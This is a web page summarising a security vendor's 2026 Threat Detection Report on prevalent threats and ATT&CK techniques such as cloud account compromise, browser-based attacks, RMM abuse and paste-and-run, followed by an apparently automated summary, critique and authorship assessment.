The 2026 Threat Detection Report is here, arming you and your team with actionable insights into the year’s most prevalent security trends, threats, and MITRE ATT&CK® techniques. Our eighth annual retrospective presents an in-depth analysis of more than 110,000 threats detected across over 4.5 million identities, endpoints, and cloud assets over the past year. This report provides you with a comprehensive view of this threat landscape, along with practical guidance on detection, testing, prevention, and mitigation.
Key findings
As the technology that we rely on to conduct business continues to evolve, so do the threats that we face. Here are some of our key findings:
- AI threats materialize in two ways: Adversaries using AI to develop threats and adversaries attempting to compromise corporate AI systems
- Cloud account compromises continue to soar, and we detected more identity threats than ever.
- Browsers continue to be a critical focal point for adversaries and defenders alike. In addition to targeting information stored within browsers, adversaries commonly deliver payloads via browsers as well.
- RMM tools have become the payload of choice for a wide variety of differently motivated adversaries, and are often the payload that follow paste-and-run campaigns.
We also check back on the timeless threats and techniques that are prevalent year-after-year, and explore emerging ones that are worth keeping an eye on. Our Field Guide to Color Bird Threats has been updated with the latest sightings of Red Canary-named threat clusters.
Trends
Since its inception eight years ago, The Threat Detection Report has been anchored by data-driven insights into the most prevalent adversary behaviors we witness on a daily basis. The Trends section allows us to zoom out from our top 10 lists to highlight developments in adversary tradecraft and other patterns that we anticipate making waves in the coming year.
This year’s report covers the AI landscape from two different perspectives: AI-powered threats and threats to AI infrastructure.
We also cover supply chain compromises, infostealers, RMM tool abuse, and much more.
Threats
Our top 10 threats list demonstrates how adversaries have shifted their operations to the browser, with the majority of the top threats either executing from the browser or stealing information stored in it. Most of these threats also employed the increasingly popular paste-and-run technique at some point in 2025.
Half of our top 10 threats are new to the rankings this year, including two trojans that execute malicious commands while also delivering on what they claim to do: JustAskJacky and Tampered Chef.
Two Red Canary-named threats updated their tradecraft significantly in 2025, including number 1 Amber Albatross and number 6 Scarlet Goldfinch.
In addition to the top 10, we also share analysis for featured threat CleanUpLoader.
Techniques
Cloud Accounts tops our list of most prevalent techniques for the second year in a row, thanks to increased attention from adversaries and defenders alike. New to the top 10 list are Data From Cloud Storage and Malicious Copy and Paste (aka paste and run or ClickFix).
Rarely do more than two or three net new techniques make into our top 10 technique list. Over the last five years, we’ve detected at least one of the 10 most prevalent techniques in 46 percent of all detections. Over the same time period, we detected at least one of the top 20 techniques in 63 percent of detections.
By focusing on these “forever techniques,” you can virtually cut your organization’s risk in half.
In addition to the top 10, we also share analysis for the Steal Application Access Token technique, which encompasses the many varieties of OAuth content attacks we’ve seen in the wild.
Explore our new Threat Detection Library
Thousands of defenders visit the Threat Detection Report website all year round, implementing the detection opportunities and mitigation guidance as they run into malicious behaviors in their environments. Our new Threat Detection Library makes it even easier to search for threat and technique pages in a central hub.
Get started
The Threat Detection Report is both a timely read and an evergreen resource that practitioners refer to throughout the year. The web version of the report includes even more technical details into visibility, collection, detection, and testing, with actionable guidance should you run into this behavior in your environment.
If you’re intimidated by the PDF’s page count, don’t fret–the Executive Summary provides high-level takeaways for security leaders and any one else who’s short on time. To kick things off, we encourage you to flip through the report, share it with your team, and start a discussion about which threats and techniques should be prioritized in your organization’s threat model.
Facts Only
The 2026 Threat Detection Report analyzes over 110,000 threats detected across 4.5 million identities, endpoints, and cloud assets.
AI threats manifest in two forms: adversaries using AI to develop threats and targeting corporate AI systems.
Cloud account compromises and identity threats have increased significantly.
Browsers are a primary focal point for adversaries, used for both data theft and payload delivery.
Remote Monitoring and Management (RMM) tools are frequently used as payloads, often following paste-and-run campaigns.
Half of the top 10 threats in 2026 are new, including the trojans JustAskJacky and Tampered Chef.
Two Red Canary-named threats, Amber Albatross and Scarlet Goldfinch, updated their tradecraft in 2025.
Cloud Accounts is the most prevalent technique for the second consecutive year.
New techniques in the top 10 include Data From Cloud Storage and Malicious Copy and Paste (ClickFix).
Over the past five years, at least one of the top 10 techniques appeared in 46% of all detections.
The report introduces a new Threat Detection Library for centralized access to threat and technique analysis.
The report is available in both PDF and web formats, with the web version offering additional technical details.
Executive Summary
The 2026 Threat Detection Report provides a comprehensive analysis of over 110,000 threats detected across 4.5 million identities, endpoints, and cloud assets in the past year. Key findings highlight the dual emergence of AI threats—both adversaries leveraging AI to develop attacks and targeting corporate AI systems—as well as a surge in cloud account compromises and identity-based threats. Browsers remain a critical attack vector, with adversaries exploiting them for both data theft and payload delivery. Remote Monitoring and Management (RMM) tools have become a favored payload, often deployed in paste-and-run campaigns. The report also tracks persistent threats like infostealers and supply chain compromises, alongside evolving techniques such as malicious copy-and-paste (ClickFix) and OAuth token theft. Notably, half of the top 10 threats are new, including trojans like JustAskJacky and Tampered Chef, while established threats like Amber Albatross and Scarlet Goldfinch have updated their tradecraft. The report emphasizes "forever techniques," such as cloud account compromises, which appear in nearly half of all detections, and offers actionable guidance for detection, prevention, and mitigation. A new Threat Detection Library centralizes resources for defenders, making it easier to search for threat and technique analysis.
The report serves as both a timely snapshot of the current threat landscape and an evergreen resource for security practitioners. It balances high-level insights for executives with technical details for operational teams, encouraging organizations to prioritize threats based on their unique risk profiles. While the focus remains on data-driven trends, the inclusion of emerging threats and updated tradecraft underscores the dynamic nature of cybersecurity challenges.
Full Take
The 2026 Threat Detection Report presents a compelling narrative about the evolving cybersecurity landscape, grounded in empirical data and actionable insights. At its strongest, the report excels in translating complex threat intelligence into practical guidance, bridging the gap between high-level trends and operational realities. The emphasis on "forever techniques" like cloud account compromises—appearing in nearly half of all detections—highlights a pragmatic approach to risk reduction, while the inclusion of emerging threats like AI-powered attacks and RMM tool abuse demonstrates foresight. The report’s dual focus on both adversary innovation (e.g., paste-and-run campaigns) and persistent vulnerabilities (e.g., browser-based exploits) provides a balanced view of the threat environment.
However, the narrative leans heavily on the authority of data volume (110,000 threats, 4.5 million assets) and proprietary naming conventions (e.g., Red Canary’s "Color Bird" threats), which could subtly reinforce a sense of inevitability or insider expertise. The framing of AI threats as a dual-pronged problem—adversaries using AI and targeting AI—risks oversimplifying a nuanced issue, potentially obscuring the broader systemic risks of AI integration in security infrastructure. The report’s structure, while comprehensive, may also inadvertently prioritize novelty (e.g., new threats in the top 10) over deeper structural vulnerabilities, such as the persistent reliance on legacy systems or human factors in security failures.
Rooted in a paradigm of adaptive defense, the report assumes that threat intelligence, when properly disseminated, can outpace adversary innovation. Yet, it leaves unexamined the paradox of detection: as defenders improve, adversaries evolve, creating an arms race that may disproportionately benefit security vendors over end-users. The second-order implications are significant—organizations may over-invest in reactive measures (e.g., detecting paste-and-run campaigns) while underestimating the human and organizational factors that enable such attacks. Who benefits? Security firms and consultants, certainly, but also adversaries who exploit the gaps between detection and mitigation.
Bridge questions: How might the focus on "forever techniques" blind organizations to systemic vulnerabilities that don’t fit neatly into MITRE ATT&CK frameworks? What would it look like to measure the effectiveness of threat intelligence not just by detection rates, but by reductions in actual harm? And if AI is both a tool for attackers and a target, how can defenders avoid the trap of fighting the last war while the next one is already underway?
Counterstrike scan: A coordinated influence campaign pushing this narrative would likely amplify the urgency of emerging threats (e.g., AI, RMM abuse) to drive demand for security products, while downplaying structural issues like poor identity management or legacy system risks. The actual content aligns with this pattern in its emphasis on novelty and data volume, but it stops short of overt fear-mongering or product pitches, maintaining a focus on actionable intelligence. The alignment is partial but not malicious—more a reflection of industry incentives than manipulation.
Patterns detected: ARC-0024 Ambiguity (in the dual framing of AI threats), ARC-0043 Motte-and-Bailey (emphasizing both timeless and emerging threats without resolving tensions between them).
Sentinel — Human
The text exhibits strong human authorship signals, including domain expertise, idiosyncratic phrasing, and data-backed claims, with minimal stylometric or structural red flags.